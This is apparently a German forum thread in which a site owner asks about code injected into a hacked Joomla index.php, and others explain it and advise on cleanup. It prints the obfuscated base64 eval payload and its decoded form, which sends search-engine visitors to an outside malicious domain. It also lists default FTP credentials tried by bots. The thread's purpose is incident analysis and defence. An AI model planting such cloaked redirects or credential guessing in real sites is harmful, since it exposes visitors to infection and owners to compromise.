Einbruch auf meinem Server

[Sin]

Hallo zusammen

Ich habe auf einem meiner Server Joomla 1.5.x installiert. Dann habe ich neulich festgestellt, dass meine Joomla Installation (oder der Server oder was auch immer) gehackt wurde.

Und zwar stand plötzlich in der index.php von Joomla folgendes ganz oben:

PHP-Code:

eval(base64_decode("CgoKZXJyb3JfcmVwb3J0aW5nKDApOwokbmNjdj1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkbmNjdil7CiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7CiAgICBpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewoJICAgIGhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wdXRpdG5vdy5vc2EucGwvIik7CiAgICBleGl0KCk7Cgl9Cgl9Cgl9Cgl9")); 


Das kommt sicher nicht von mir. Mit echo sehe ich, dass daraus folgendes wird:

Code:

error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if ($ua){ if (stristr($referer,"aol.com") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://putitnow.osa.pl/"); exit(); } } } }

Kann mir jemand helfen und sagen, was das Stück Code bewirkt?

[maxi89]

Ich drösel es dir mal auf

PHP-Code:


// Keine Fehlermeldungen ausgeben, klar ;)
error_reporting(0);

// Abfragen, ob bereits Ausgabe an den Browser gesendet wurde.
$nccv=headers_sent();

// ... wenn nicht...
if (!$nccv)
{
     // Abfragen, woher der Besucher kommt und als was er sich identifiziert
     $referer=$_SERVER['HTTP_REFERER'];
     $ua=$_SERVER['HTTP_USER_AGENT'];

     // Wenn der User-Agent bekannt ist...
     if ($ua)
     {
          // ...prüfen, ob der Besucher von aol.com, yahoo, google u.s.w. kommt
          if (stristr($referer,"aol.com")
          or stristr($referer,"yahoo")
          or stristr($referer,"google")
          or stristr($referer,"bing")
          or stristr($referer,"ask.com")
          or stristr($referer,"msn")
          or stristr($referer,"live")
          or stristr($referer,"facebook"))
          {
               // ... und es keine Google-Cache-Seite war oder irgendwas mit "inurl" im Referrer steht
               if (!stristr($referer,"cache")
               or !stristr($referer,"inurl"))
               {
                    // ... leite ihn weiter auf diese URL
                    header("Location: http://putitnow.osa.pl/");
                    exit();
               }
          }
     }
} 


Das soll verhindern, dass der Einbruch sofort bemerkt wird, weil der Webmaster ja selten über Google seine Seiten aufruft.
Man versucht hier gezielt nur die Leute zu infizieren, die über Suchmaschinen oder Social Networks zu dir kommen.
Außerdem verhindert es wirkungsvoll, dass z.B. Googles Malware-Scan die Seite als infektiös einstuft, der Google-Bot kommt meines Wissens ohne Referrer daher.



Falls du noch nach dem Einfallstor suchst:
Sollte der Angreifer sich über FTP Zugang verschafft haben, prüfe bitte einmal, was als Kennwort gesetzt war/ist (und sperre FTP ggf. erstmal).
Meine Honeypots werden inzwischen gerne und oft überfallen und es hat sich herauskristallisiert, dass eigentlich nur wenige Kombinationen durchprobiert werden.
Hier z.B. von meinem FTP-Honeypot:

Code:

USER = web0
PASS = web0

USER = web0
PASS = 123456

USER = web1
PASS = web1

USER = web1
PASS = 123456

...

Einige wenige Bots versuchen es tatsächlich gezielt mit komplexeren Kombinationen oder direkt mit SQL-Injections.
Gleiches gilt auch für POP3-Logins. Da werden die Postfächer mit den selben Benutzer-/Passwort-Kombinationen versucht zu knacken...

[Sin]

Danke.

Aber der Aufruf der URL ***.osa.pl bringt nichts. Wie soll da etwas nachgeladen werden?

[maxi89]

Entweder ist der Account gesperrt oder denen schmeckt der Referrer nicht...

NACHTRAG:
Jepp, liegt am fehlenden Referrer.
Wird die Seite über einen Link aufgerufen und nicht direkt über die Adressleiste, erfolgt ein weiterer Redirect auf eine offenbar verseuchte Seite...

[Sin]

Oh..

Danke für die Ausführung.

Jetzt stellt sich mir die Frage, wie ich das auf meinen anderen Domains immer kontrollieren kann. Ich würde gerne über FTP sehen, welche Dateien verändert wurden. Geht das (einfach) mit OS X?

[Sin]

Falls du noch nach dem Einfallstor suchst:
Sollte der Angreifer sich über FTP Zugang verschafft haben, prüfe bitte einmal, was als Kennwort gesetzt war/ist (und sperre FTP ggf. erstmal).

Habe mal nachgeschaut. FTP-User ist natürlich ein web**. Das Passwort hat aber 12 Zeichen. Groß-, Kleinbuchstaben und Zahlen gemischt. Das ist dann sicher nicht das Problem gewesen.

[threadi]

Bei einem vermuteten Angriff solltest Du schleunigst alle Passwörter ändern. Egal welche und worüber der Angriff kam. FTP, Datenbanken, auch dein Admin-Login vom Shop und ggfs. auch die Zugänge von Kunden. Du kannst dir nie sofort sicher sein was alles ausgespäht wurde. Danach erst solltest Du in Logfiles schauen wer wann auf was zugegriffen hat. Ich schaue dazu meist auch erst ins FTP-Log, einmal kam sowas sogar über einen MySQL-Zugriff zustande wo der Host nicht gesperrt war, auch SSH sollte man prüfen, wenn vorhanden.

Außerdem würde ich nicht schauen welche Dateien bearbeitet wurden sondern sofort alle Dateien mit einer lokalen Sicherung überschreiben. Wenn Du die nicht hast, solltest Du eine Neuinstallation vornehmen.

[Sin]

Bei einem vermuteten Angriff solltest Du schleunigst alle Passwörter ändern. Egal welche und worüber der Angriff kam. FTP, Datenbanken, auch dein Admin-Login vom Shop und ggfs. auch die Zugänge von Kunden. Du kannst dir nie sofort sicher sein was alles ausgespäht wurde.[/QUOTE]
Passwörter sind alle geändert.

Außerdem würde ich nicht schauen welche Dateien bearbeitet wurden sondern sofort alle Dateien mit einer lokalen Sicherung überschreiben. Wenn Du die nicht hast, solltest Du eine Neuinstallation vornehmen.

Ich habe eine Neuinstallation gemacht. Mir war das zu heikel da hunderte Dateien zu vergleichen und checken. Alles neu.